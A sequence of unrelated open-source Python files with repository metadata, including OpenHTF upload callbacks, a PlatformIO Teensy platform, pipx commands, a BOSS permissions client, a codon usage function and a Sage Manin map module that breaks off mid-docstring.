"""Returns a callback to convert test record to proto and save to disk."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'save_to_disk.')
pattern = filename_pattern or self._default_filename_pattern
if not pattern:
raise RuntimeError('Must specify provide a filename_pattern or set a '
'_default_filename_pattern on subclass.')
def save_to_disk_callback(test_record_obj):
proto = self._convert(test_record_obj)
output_to_file = callbacks.OutputToFile(pattern)
with output_to_file.open_output_file(test_record_obj) as outfile:
outfile.write(proto.SerializeToString())
return save_to_disk_callback
def upload(self, payload_type=guzzle_pb2.COMPRESSED_TEST_RUN):
"""Returns a callback to convert a test record to a proto and upload."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'upload.')
if not self.credentials:
raise RuntimeError('Must provide credentials to use upload callback.')
def upload_callback(test_record_obj):
proto = self._convert(test_record_obj)
self.upload_result = send_mfg_inspector_data(proto, self.credentials,
self.destination_url,
payload_type)
return upload_callback
def partial_upload(self, payload_type: int = guzzle_pb2.COMPRESSED_TEST_RUN):
"""Returns a callback to partially upload a test record as a MfgEvent."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'partial_upload.')
if not self.credentials:
raise RuntimeError('Must provide credentials to use partial_upload '
'callback.')
def partial_upload_callback(test_record_obj: test_record.TestRecord):
if not test_record_obj.end_time_millis:
# We cannot mutate the test_record_obj, so we copy it to add a
# fake end_time_millis which is needed for MfgEvent construction.
try:
tmp_test_record = copy.deepcopy(test_record_obj)
except TypeError:
          # This happens when the test has errored but the partial uploader got
          # hold of the test record before it was finalized. We skip the deepcopy
          # and only process an errored test after end_time_millis has been set
          # in the test record.
print('Skipping this upload cycle, waiting for test to be finalized')
return {}
tmp_test_record.end_time_millis = util.time_millis()
# Also fake a PASS outcome for now.
tmp_test_record.outcome = test_record.Outcome.PASS
proto = self._convert(tmp_test_record)
proto.test_run_type = mfg_event_pb2.TEST_RUN_PARTIAL
else:
proto = self._convert(test_record_obj)
proto.test_run_type = mfg_event_pb2.TEST_RUN_COMPLETE
# Replaces the attachment payloads already uploaded with their blob_refs.
if (self._cached_partial_proto and
self._cached_partial_proto.start_time_ms == proto.start_time_ms):
# Reads the attachments in the _cached_partial_proto and merge them into
# the proto.
self._update_attachments_from_cache(proto)
# Avoids timing issue whereby last complete upload performed twice.
# This is only for projects that use a partial uploader to mfg-inspector.
if not self._partial_proto_upload_complete:
self.upload_result = send_mfg_inspector_data(
proto, self.credentials, self.destination_url, payload_type)
# Reads the upload_result (a lite_test_run proto) and update the
# attachments blob_refs.
self._update_attachments_from_reply(proto)
if proto.test_run_type == mfg_event_pb2.TEST_RUN_COMPLETE:
self._partial_proto_upload_complete = True
return self.upload_result
return partial_upload_callback
def set_converter(self, converter):
"""Set converter callable to convert a OpenHTF tester_record to a proto.
Args:
converter: a callable that accepts an OpenHTF TestRecord and returns a
manufacturing-inspector compatible protobuf.
Returns:
self to make this call chainable.
"""
assert callable(converter), 'Converter must be callable.'
self._converter = converter
return self
# LEGACY / DEPRECATED
class UploadToMfgInspector(MfgInspector):
"""Generate a mfg-inspector TestRun proto and upload it.
LEGACY / DEPRECATED
This class is provided only for legacy reasons and may be deleted in future.
Please replace usage by configuring a MfgInspectorCallback directly. For
example:
test.add_output_callbacks(
mfg_inspector.MfgInspectorCallback.from_json(**json_data).set_converter(
test_runs_converter.test_run_from_test_record).upload()
)
"""
@staticmethod
def _converter(test_record_obj):
return test_runs_converter.test_run_from_test_record(test_record_obj)
def __call__(self, test_record_obj):
upload_callback = self.upload()
upload_callback(test_record_obj)
| 36.511873
| 80
| 0.714843
|
b1204a1b48683105ba7ac406230815b2261bee39
| 5,739
|
py
|
Python
|
platform.py
|
lekoook/platform-teensy
|
d92b12a5d2b0c931e0ce4551fe1770b6db2592ce
|
[
"Apache-2.0"
] | null | null | null |
platform.py
|
lekoook/platform-teensy
|
d92b12a5d2b0c931e0ce4551fe1770b6db2592ce
|
[
"Apache-2.0"
] | null | null | null |
platform.py
|
lekoook/platform-teensy
|
d92b12a5d2b0c931e0ce4551fe1770b6db2592ce
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import platform
from platformio import exception, util
from platformio.managers.platform import PlatformBase
from platformio.util import get_systype
class TeensyPlatform(PlatformBase):
@staticmethod
def _is_macos():
systype = util.get_systype()
return "darwin_x86_64" in systype
@staticmethod
def _is_linux():
systype = util.get_systype()
return "linux_x86_64" in systype
@staticmethod
def _is_windows():
systype = util.get_systype()
return "windows" in systype
def configure_default_packages(self, variables, targets):
if variables.get("board"):
board_config = self.board_config(variables.get("board"))
del_toolchain = "toolchain-gccarmnoneeabi"
if board_config.get("build.core") != "teensy":
del_toolchain = "toolchain-atmelavr"
if del_toolchain in self.packages:
del self.packages[del_toolchain]
if self._is_linux() and "toolchain-arm-cortexm-mac" in self.packages:
del self.packages['toolchain-arm-cortexm-mac']
if self._is_linux() and "toolchain-arm-cortexm-win64" in self.packages:
del self.packages['toolchain-arm-cortexm-win64']
if self._is_linux() and "toolchain-gccarmnoneeabi" in self.packages:
del self.packages['toolchain-gccarmnoneeabi']
if self._is_macos() and "toolchain-arm-cortexm-linux" in self.packages:
del self.packages['toolchain-arm-cortexm-linux']
if self._is_macos() and "toolchain-arm-cortexm-win64" in self.packages:
del self.packages['toolchain-arm-cortexm-win64']
if self._is_macos() and "toolchain-gccarmnoneeabi" in self.packages:
del self.packages['toolchain-gccarmnoneeabi']
if self._is_windows() and "toolchain-arm-cortexm-linux" in self.packages:
del self.packages['toolchain-arm-cortexm-linux']
if self._is_windows() and "toolchain-arm-cortexm-mac" in self.packages:
del self.packages['toolchain-arm-cortexm-mac']
if self._is_windows() and "toolchain-gccarmnoneeabi" in self.packages:
del self.packages['toolchain-gccarmnoneeabi']
if "mbed" in variables.get("pioframework", []):
self.packages["toolchain-gccarmnoneeabi"][
"version"] = ">=1.60301.0,<1.80000.0"
# configure J-LINK tool
jlink_conds = [
"jlink" in variables.get(option, "")
for option in ("upload_protocol", "debug_tool")
]
if variables.get("board"):
board_config = self.board_config(variables.get("board"))
jlink_conds.extend([
"jlink" in board_config.get(key, "")
for key in ("debug.default_tools", "upload.protocol")
])
jlink_pkgname = "tool-jlink"
if not any(jlink_conds) and jlink_pkgname in self.packages:
del self.packages[jlink_pkgname]
return PlatformBase.configure_default_packages(
self, variables, targets)
def get_boards(self, id_=None):
result = PlatformBase.get_boards(self, id_)
if not result:
return result
if id_:
return self._add_default_debug_tools(result)
else:
for key, value in result.items():
result[key] = self._add_default_debug_tools(result[key])
return result
def _add_default_debug_tools(self, board):
debug = board.manifest.get("debug", {})
upload_protocols = board.manifest.get("upload", {}).get(
"protocols", [])
if "tools" not in debug:
debug["tools"] = {}
if "jlink" in upload_protocols and "jlink" not in debug["tools"]:
assert debug.get("jlink_device"), (
"Missed J-Link Device ID for %s" % board.id)
debug["tools"]["jlink"] = {
"server": {
"package": "tool-jlink",
"arguments": [
"-singlerun",
"-if", "SWD",
"-select", "USB",
"-device", debug.get("jlink_device"),
"-port", "2331"
],
"executable": ("JLinkGDBServerCL.exe"
if platform.system() == "Windows" else
"JLinkGDBServer")
}
}
board.manifest["debug"] = debug
return board
def configure_debug_options(self, initial_debug_options, ide_data):
debug_options = copy.deepcopy(initial_debug_options)
server_executable = debug_options["server"]["executable"].lower()
adapter_speed = initial_debug_options.get("speed")
if adapter_speed:
if "jlink" in server_executable:
debug_options["server"]["arguments"].extend(
["-speed", adapter_speed]
)
return debug_options
| 41.28777
| 85
| 0.597491
|
b8034ffeaad6ad8ec107e8d84d94fecf4b237034
| 1,398
|
py
|
Python
|
src/grokcore/security/tests/test_functional.py
|
zopefoundation/grokcore.security
|
82828d6f4f74db8bdd9e4bbcc5b7453bfb455cfe
|
[
"ZPL-2.1"
] | null | null | null |
src/grokcore/security/tests/test_functional.py
|
zopefoundation/grokcore.security
|
82828d6f4f74db8bdd9e4bbcc5b7453bfb455cfe
|
[
"ZPL-2.1"
] | 2
|
2018-01-03T13:56:03.000Z
|
2021-04-23T06:23:19.000Z
|
src/grokcore/security/tests/test_functional.py
|
zopefoundation/grokcore.security
|
82828d6f4f74db8bdd9e4bbcc5b7453bfb455cfe
|
[
"ZPL-2.1"
] | 2
|
2015-04-03T04:58:02.000Z
|
2018-01-12T06:52:41.000Z
|
import doctest
import grokcore.security
import unittest
import zope.app.wsgi.testlayer
import zope.testbrowser.wsgi
from pkg_resources import resource_listdir
from zope.app.wsgi.testlayer import http
class Layer(
zope.testbrowser.wsgi.TestBrowserLayer,
zope.app.wsgi.testlayer.BrowserLayer):
pass
layer = Layer(grokcore.security, allowTearDown=True)
def suiteFromPackage(name):
layer_dir = 'functional'
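    # Collect every module under functional/<name> into a doctest suite bound to the functional layer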
files = resource_listdir(__name__, '{}/{}'.format(layer_dir, name))
suite = unittest.TestSuite()
for filename in files:
if not filename.endswith('.py'):
continue
if filename == '__init__.py':
continue
dottedname = 'grokcore.security.tests.%s.%s.%s' % (
layer_dir, name, filename[:-3])
test = doctest.DocTestSuite(
dottedname,
extraglobs=dict(
getRootFolder=layer.getRootFolder,
http=http,
),
optionflags=(
doctest.ELLIPSIS +
doctest.NORMALIZE_WHITESPACE +
doctest.REPORT_NDIFF +
doctest.IGNORE_EXCEPTION_DETAIL))
test.layer = layer
suite.addTest(test)
return suite
def test_suite():
suite = unittest.TestSuite()
for name in [
'role']:
suite.addTest(suiteFromPackage(name))
return suite
| 26.377358
| 71
| 0.616595
|
047775eaad7b3aeb10f157ffa446d13ec7c2e515
| 740
|
py
|
Python
|
src/pipx/commands/__init__.py
|
KenMacD/pipx
|
2ecc668acf472ad6956cc682499c077c1130d17e
|
[
"MIT"
] | null | null | null |
src/pipx/commands/__init__.py
|
KenMacD/pipx
|
2ecc668acf472ad6956cc682499c077c1130d17e
|
[
"MIT"
] | 3
|
2022-03-23T01:19:59.000Z
|
2022-03-23T01:26:01.000Z
|
src/pipx/commands/__init__.py
|
KenMacD/pipx
|
2ecc668acf472ad6956cc682499c077c1130d17e
|
[
"MIT"
] | null | null | null |
from pipx.commands.ensure_path import ensure_pipx_paths
from pipx.commands.environment import environment
from pipx.commands.inject import inject
from pipx.commands.install import install
from pipx.commands.list_packages import list_packages
from pipx.commands.reinstall import reinstall, reinstall_all
from pipx.commands.run import run
from pipx.commands.run_pip import run_pip
from pipx.commands.uninstall import uninstall, uninstall_all
from pipx.commands.upgrade import upgrade, upgrade_all
__all__ = [
"upgrade",
"upgrade_all",
"run",
"install",
"inject",
"uninstall",
"uninstall_all",
"reinstall",
"reinstall_all",
"list_packages",
"run_pip",
"ensure_pipx_paths",
"environment",
]
| 27.407407
| 60
| 0.759459
|
0a0558d88d74fa41c0a24eee0a5ec8f782f5a2a4
| 2,497
|
py
|
Python
|
api/handler.py
|
jaymoulin/google-musicmanager-dedup-api
|
c16fb7d98449c046ce486cfe21cc94d7a111070b
|
[
"MIT"
] | 2
|
2019-03-02T23:46:05.000Z
|
2020-07-20T21:03:30.000Z
|
api/handler.py
|
jaymoulin/google-musicmanager-dedup-api
|
c16fb7d98449c046ce486cfe21cc94d7a111070b
|
[
"MIT"
] | 1
|
2019-07-12T21:13:33.000Z
|
2019-07-16T17:06:47.000Z
|
api/handler.py
|
jaymoulin/google-musicmanager-dedup-api
|
c16fb7d98449c046ce486cfe21cc94d7a111070b
|
[
"MIT"
] | 1
|
2019-12-12T17:45:46.000Z
|
2019-12-12T17:45:46.000Z
|
from http.server import BaseHTTPRequestHandler
import os
import sqlite3
from urllib.parse import urlparse, parse_qs
from cgi import parse_header, parse_multipart
def _get_connection() -> sqlite3.Connection:
db_path = os.getenv("DB_PATH", "/app/db/googlemusicmanager.db")
db_exists = os.path.isfile(db_path)
if not db_exists:
basedir = os.path.dirname(db_path)
if not os.path.exists(basedir):
os.makedirs(basedir)
open(db_path, 'a').close()
connection = sqlite3.connect(db_path)
if not db_exists:
cursor = connection.cursor()
cursor.execute('CREATE TABLE path (date text, path text)')
connection.commit()
return connection
_connection = _get_connection()
class ApiHandler(BaseHTTPRequestHandler):
def do_GET(self):
path = self._get_path()
cursor = _connection.cursor()
cursor.execute('SELECT count(*) FROM path WHERE path=?', path)
result = cursor.fetchone()[0]
self.send_response(404 if result == 0 else 204)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_POST(self):
path = self._get_path()
cursor = _connection.cursor()
cursor.execute('INSERT INTO path (path, "date") VALUES (?, date("now"))', path)
_connection.commit()
self.send_response(204)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_DELETE(self):
path = self._get_path()
cursor = _connection.cursor()
cursor.execute('DELETE FROM path WHERE path=?', path)
_connection.commit()
self.send_response(204)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def _get_path(self):
query_components = parse_qs(urlparse(self.path).query)
path = query_components.get("path")
if not path:
postvars = self._parse_POST()
path = (postvars['path'][0],)
return path
def _parse_POST(self):
ctype, pdict = parse_header(self.headers['content-type'])
if ctype == 'multipart/form-data':
postvars = parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers['content-length'])
postvars = parse_qs(self.rfile.read(length).decode('utf-8'), keep_blank_values=1)
else:
postvars = {}
return postvars
| 33.743243
| 93
| 0.634361
|
a7d2f35c6de99272440d09cc31e58e1252e7b558
| 2,028
|
py
|
Python
|
BCAWT/CA_RSCU.py
|
AliYoussef96/BCAW-Tool
|
a296a52f8795325f08e0c6f00838b9e851f9459e
|
[
"MIT"
] | 3
|
2019-10-22T07:08:40.000Z
|
2021-07-27T14:12:25.000Z
|
BCAWT/CA_RSCU.py
|
AliYoussef96/BCAW-Tool
|
a296a52f8795325f08e0c6f00838b9e851f9459e
|
[
"MIT"
] | 13
|
2019-06-26T07:21:25.000Z
|
2021-07-23T15:01:31.000Z
|
BCAWT/CA_RSCU.py
|
AliYoussef96/BCAW-Tool
|
a296a52f8795325f08e0c6f00838b9e851f9459e
|
[
"MIT"
] | 3
|
2019-07-25T00:13:36.000Z
|
2020-09-25T01:58:34.000Z
|
def CA_RSCU(allseq,allseq_name,The_Genetic_Codes_number=1):
"""calculate RSCU values for correspondence analysis.
Args:
allseq (str): DNA sequence
allseq_name (str) : gene name
The_Genetic_Codes_number (int) : default = 1, The Genetic Codes number described by NCBI (https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi)
Returns:
DataFrame: DataFrame contains [gene_name and RSCU values]
"""
from Bio.Data import CodonTable
from Bio.Seq import Seq
import re
from Bio.Alphabet import generic_dna
import pandas as pd
from pandas import DataFrame
from itertools import tee
    # use the selected genetic code so the codon table matches the translation table used below
    xcodontable = CodonTable.unambiguous_dna_by_id[The_Genetic_Codes_number]
ycodontable = xcodontable.forward_table
zcodontable = [ycodontable[i] for i in ycodontable]
qcodontable = [i for i in ycodontable ]
    # drop amino acids encoded by a single codon (no synonymous alternative);
    # a list comprehension avoids mutating the list while iterating over it
    zcodontable = [aa for aa in zcodontable if zcodontable.count(aa) > 1]
RSCU = {}
sequ = str(allseq)
allseqstr, allseqstr_1 = tee(sequ[i: i+3] for i in range(0, len(sequ), 3) if len(sequ[i: i+3]) == 3)
qcodontable = ( i for i in qcodontable)
dic2 = {}
allseqstr2 = Seq('', generic_dna)
for i in allseqstr:
allseqstr2 += i
aminoacid2 = allseqstr2.translate(table = The_Genetic_Codes_number , stop_symbol ='')
aminoacid2 = str(aminoacid2)
RSCUall = {}
for ii in allseqstr_1:
dic2[ii] = dic2.get(ii,0) + 1
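    # RSCU = observed codon count / (amino acid count / number of synonymous codons),
    # i.e. observed usage relative to equal usage of all synonymous codons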
for k in qcodontable:
RSCUall[k] = 0
if k in dic2:
try:
rscu2 = dic2[k] / ((1/ zcodontable.count(ycodontable[k]))*(aminoacid2.count(ycodontable[k])))
RSCUall[k] = round(rscu2,6)
except ZeroDivisionError:
pass
df = pd.DataFrame(index=pd.Series([i for i in RSCUall]))
df[allseq_name] = [RSCUall[r] for r in RSCUall ]
    df.drop(['ATG'], axis=0, inplace=True)
df.sort_index(inplace=True)
return df
| 32.190476
| 156
| 0.609961
|
9b316bea09d1b228aca02e3036c8eabbc8567d1b
| 6,483
|
py
|
Python
|
src/bossmeta.py
|
NeuroDataDesign/lids-bloby
|
9fb51bfa38d66f3c120c9d42f87b51d915e0ff12
|
[
"Apache-2.0"
] | null | null | null |
src/bossmeta.py
|
NeuroDataDesign/lids-bloby
|
9fb51bfa38d66f3c120c9d42f87b51d915e0ff12
|
[
"Apache-2.0"
] | 1
|
2018-07-18T13:51:46.000Z
|
2018-07-18T13:51:49.000Z
|
src/bossmeta.py
|
NeuroDataDesign/lids-bloby
|
9fb51bfa38d66f3c120c9d42f87b51d915e0ff12
|
[
"Apache-2.0"
] | null | null | null |
import requests
BOSS_VERSION = 'v1'
class BossMeta:
def __init__(self, collection, experiment, channel):
self._collection = collection
self._experiment = experiment
self._channel = channel
self._session = requests.Session()
self._session.stream = False
def session(self):
return self._session
def channel(self):
return self._channel
def experiment(self):
return self._experiment
def collection(self):
return self._collection
class BossRemoteProxy:
def __init__(self, boss_url, token, meta):
self.boss_url = boss_url
if self.boss_url[-1] != '/':
self.boss_url += '/'
self.token = token
# BossMeta contains col, exp, chn info
self.meta = meta
    def _get(self, url, headers=None):
        # avoid a shared mutable default; copy so the caller's dict is not modified
        headers = dict(headers or {})
        if url[0] == '/':
            url = url[1:]
        headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().get("{}{}".format(
self.boss_url, url), headers=headers)
assert resp.status_code == 200
return resp
    def _post(self, url, headers=None, data={}):
        headers = dict(headers or {})
        if url[0] == '/':
            url = url[1:]
        headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().post("{}{}".format(self.boss_url, url),
headers=headers, data=data)
if resp.status_code != 201:
print('Failed POST with ', data)
return resp
    def _patch(self, url, headers=None, data={}):
        headers = dict(headers or {})
        if url[0] == '/':
            url = url[1:]
        headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().patch("{}{}".format(self.boss_url, url),
headers=headers, data=data)
if resp.status_code != 200:
print('Failed PATCH with ', data)
return resp
    def _delete(self, url, headers=None, data={}):
        headers = dict(headers or {})
        if url[0] == '/':
            url = url[1:]
        headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().delete("{}{}".format(self.boss_url, url),
headers=headers, data=data)
if resp.status_code != 202:
print('Failed DEL with ', data)
return resp
def query_perms(self, group, collection, experiment=None, channel=None):
query_url = "{}/permissions/?group={}&collection={}".format(
BOSS_VERSION, group, collection)
if experiment is not None:
query_url = query_url + '&experiment={}'.format(experiment)
if channel is not None:
query_url = query_url + '&channel={}'.format(channel)
r = self._get(query_url)
resp = r.json()
# just the perms of the group
return resp['permission-sets'][0]['permissions']
def list_data(self, list_url):
# print(list_url)
resp = self._get(list_url)
return resp.json()
def list_groups(self):
list_url = "{}/groups/".format(BOSS_VERSION)
return self.list_data(list_url)['groups']
def list_collections(self):
list_url = "{}/collection/".format(BOSS_VERSION)
return self.list_data(list_url)['collections']
def list_experiments(self):
list_url = "{}/collection/{}/experiment/".format(
BOSS_VERSION, self.meta.collection())
return self.list_data(list_url)['experiments']
def list_channels(self, experiment):
list_url = "{}/collection/{}/experiment/{}/channel".format(
BOSS_VERSION, self.meta.collection(), experiment)
return self.list_data(list_url)['channels']
def add_permissions(self, group, permissions, vol_permissions):
self._add_del_perms(group, permissions, vol_permissions, 'add')
def delete_permissions(self, group, permissions, vol_permissions):
self._add_del_perms(group, permissions, vol_permissions, 'del')
def _add_del_perms(self, group, permissions, vol_permissions, add_del):
perm_url = "{}/permissions/".format(BOSS_VERSION)
# set perm on collection
data = {'group': group, 'permissions': permissions,
'collection': self.meta.collection()}
if add_del == 'add':
self._post(perm_url, data=data)
else:
existing_group_perms = self.query_perms(
group, self.meta.collection())
new_perms = diff(existing_group_perms, permissions)
data['permissions'] = new_perms
self._patch(perm_url, data=data)
if self.meta.experiment() is None:
# set perms for all experiments
experiments = self.list_experiments()
else:
experiments = [self.meta.experiment()]
for experiment in experiments:
data = {'group': group, 'permissions': permissions,
'collection': self.meta.collection(), 'experiment': experiment}
if add_del == 'add':
self._post(perm_url, data=data)
else:
existing_group_perms = self.query_perms(
group, self.meta.collection(), experiment=experiment)
new_perms = diff(existing_group_perms, permissions)
data['permissions'] = new_perms
self._patch(perm_url, data=data)
if self.meta.channel() is None:
# set perms for all channels
channels = self.list_channels(experiment)
else:
channels = [self.meta.channel()]
for channel in channels:
data = {'group': group, 'permissions': permissions + vol_permissions,
'collection': self.meta.collection(), 'experiment': experiment, 'channel': channel}
if add_del == 'add':
self._post(perm_url, data=data)
else:
existing_group_perms = self.query_perms(
group, self.meta.collection(), experiment=experiment, channel=channel)
new_perms = diff(existing_group_perms,
permissions + vol_permissions)
data['permissions'] = new_perms
self._patch(perm_url, data=data)
def diff(first, second):
second = set(second)
return [item for item in first if item not in second]
| 36.835227
| 107
| 0.569798
|
136dcb77eb77e45bf1db5cfe5f9b463333ae3a3c
| 34,205
|
py
|
Python
|
src/sage/modular/pollack_stevens/manin_map.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | null | null | null |
src/sage/modular/pollack_stevens/manin_map.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | null | null | null |
src/sage/modular/pollack_stevens/manin_map.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
Manin map
Represents maps from a set of right coset representatives to a
coefficient module.
This is a basic building block for implementing modular symbols, and
provides basic arithmetic and right action of matrices.
EXAMPLES::
sage: E = EllipticCurve('11a')
sage: phi = E.pollack_stevens_modular_symbol()
sage: phi
Modular symbol of level 11 with values in Sym^0 Q^2
sage: phi.values()
[-1/5, 1, 0]
sage: from sage.modular.pollack_stevens.manin_map import ManinMap, M2Z
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10)
sage: MR = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, MR, data)
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: f(M2Z([2,3,4,5]))
1
"""
#*****************************************************************************
# Copyright (C) 2012 Robert Pollack <rpollack@math.bu.edu>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from __future__ import absolute_import
from sage.rings.continued_fraction import convergents
from sage.misc.misc import verbose
from .sigma0 import Sigma0
from .fund_domain import t00, t10, t01, t11, M2Z
from sage.matrix.matrix_space import MatrixSpace
from sage.rings.integer_ring import ZZ
from sage.parallel.decorate import parallel
from operator import methodcaller
def unimod_matrices_to_infty(r, s):
r"""
Return a list of matrices whose associated unimodular paths connect `0` to ``r/s``.
INPUT:
- ``r``, ``s`` -- rational numbers
OUTPUT:
- a list of matrices in `SL_2(\ZZ)`
EXAMPLES::
sage: v = sage.modular.pollack_stevens.manin_map.unimod_matrices_to_infty(19,23); v
[
[1 0] [ 0 1] [1 4] [-4 5] [ 5 19]
[0 1], [-1 1], [1 5], [-5 6], [ 6 23]
]
sage: [a.det() for a in v]
[1, 1, 1, 1, 1]
sage: sage.modular.pollack_stevens.manin_map.unimod_matrices_to_infty(11,25)
[
[1 0] [ 0 1] [1 3] [-3 4] [ 4 11]
[0 1], [-1 2], [2 7], [-7 9], [ 9 25]
]
ALGORITHM:
This is Manin's continued fraction trick, which gives an expression
`\{0,r/s\} = \{0,\infty\} + ... + \{a,b\} + ... + \{*,r/s\}`, where each `\{a,b\}` is
the image of `\{0,\infty\}` under a matrix in `SL_2(\ZZ)`.
"""
if s == 0:
return []
# the function contfrac_q in
# https://github.com/williamstein/psage/blob/master/psage/modform/rational/modular_symbol_map.pyx
# is very, very relevant to massively optimizing this.
L = convergents(r / s)
# Computes the continued fraction convergents of r/s
v = [M2Z([1, L[0].numerator(), 0, L[0].denominator()])]
# Initializes the list of matrices
for j in range(0, len(L) - 1):
a = L[j].numerator()
c = L[j].denominator()
b = L[j + 1].numerator()
d = L[j + 1].denominator()
v.append(M2Z([(-1) ** (j + 1) * a, b, (-1) ** (j + 1) * c, d]))
# The matrix connecting two consecutive convergents is added on
return v
def unimod_matrices_from_infty(r, s):
r"""
Return a list of matrices whose associated unimodular paths connect `\infty` to ``r/s``.
INPUT:
- ``r``, ``s`` -- rational numbers
OUTPUT:
- a list of `SL_2(\ZZ)` matrices
EXAMPLES::
sage: v = sage.modular.pollack_stevens.manin_map.unimod_matrices_from_infty(19,23); v
[
[ 0 1] [-1 0] [-4 1] [-5 -4] [-19 5]
[-1 0], [-1 -1], [-5 1], [-6 -5], [-23 6]
]
sage: [a.det() for a in v]
[1, 1, 1, 1, 1]
sage: sage.modular.pollack_stevens.manin_map.unimod_matrices_from_infty(11,25)
[
[ 0 1] [-1 0] [-3 1] [-4 -3] [-11 4]
[-1 0], [-2 -1], [-7 2], [-9 -7], [-25 9]
]
ALGORITHM:
This is Manin's continued fraction trick, which gives an expression
`\{\infty,r/s\} = \{\infty,0\} + ... + \{a,b\} + ... + \{*,r/s\}`, where each
`\{a,b\}` is the image of `\{0,\infty\}` under a matrix in `SL_2(\ZZ)`.
"""
if s != 0:
L = convergents(r / s)
# Computes the continued fraction convergents of r/s
v = [M2Z([-L[0].numerator(), 1, -L[0].denominator(), 0])]
# Initializes the list of matrices
# the function contfrac_q in https://github.com/williamstein/psage/blob/master/psage/modform/rational/modular_symbol_map.pyx
# is very, very relevant to massively optimizing this.
for j in range(0, len(L) - 1):
a = L[j].numerator()
c = L[j].denominator()
b = L[j + 1].numerator()
d = L[j + 1].denominator()
v.append(M2Z([-b, (-1) ** (j + 1) * a, -d, (-1) ** (j + 1) * c]))
# The matrix connecting two consecutive convergents is added on
return v
else:
return []
class ManinMap(object):
r"""
Map from a set of right coset representatives of `\Gamma_0(N)` in
`SL_2(\ZZ)` to a coefficient module that satisfies the Manin
relations.
INPUT:
- ``codomain`` -- coefficient module
- ``manin_relations`` -- a :class:`sage.modular.pollack_stevens.fund_domain.ManinRelations` object
- ``defining_data`` -- a dictionary whose keys are a superset of
``manin_relations.gens()`` and a subset of ``manin_relations.reps()``,
and whose values are in the codomain.
- ``check`` -- do numerous (slow) checks and transformations to
ensure that the input data is perfect.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f # indirect doctest
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
"""
def __init__(self, codomain, manin_relations, defining_data, check=True):
"""
INPUT:
- ``codomain`` -- coefficient module
- ``manin_relations`` -- a :class:`ManinRelations` object
- ``defining_data`` -- a dictionary whose keys are a superset of
:meth:`manin_relations.gens()` and a subset of manin_relations.reps(),
and whose values are in the codomain.
- ``check`` -- do numerous (slow) checks and transformations to
ensure that the input data is perfect.
TESTS:
Test that it fails gracefully on some bogus inputs::
sage: from sage.modular.pollack_stevens.manin_map import ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: rels = ManinRelations(37)
sage: ManinMap(ZZ, rels, {})
Traceback (most recent call last):
...
ValueError: Codomain must have an action of Sigma0(N)
sage: ManinMap(Symk(0), rels, [])
Traceback (most recent call last):
...
ValueError: length of defining data must be the same as number of Manin generators
"""
self._codomain = codomain
self._manin = manin_relations
if check:
if not codomain.get_action(Sigma0(manin_relations._N)):
raise ValueError("Codomain must have an action of Sigma0(N)")
self._dict = {}
if isinstance(defining_data, (list, tuple)):
if len(defining_data) != manin_relations.ngens():
raise ValueError("length of defining data must be the same as number of Manin generators")
for i in xrange(len(defining_data)):
self._dict[manin_relations.gen(i)] = codomain(defining_data[i])
elif isinstance(defining_data, dict):
for g in manin_relations.gens():
self._dict[g] = codomain(defining_data[g])
else:
# constant function
try:
c = codomain(defining_data)
except TypeError:
raise TypeError("unrecognized type %s for defining_data" % type(defining_data))
g = manin_relations.gens()
self._dict = dict(zip(g, [c] * len(g)))
else:
self._dict = defining_data
def extend_codomain(self, new_codomain, check=True):
r"""
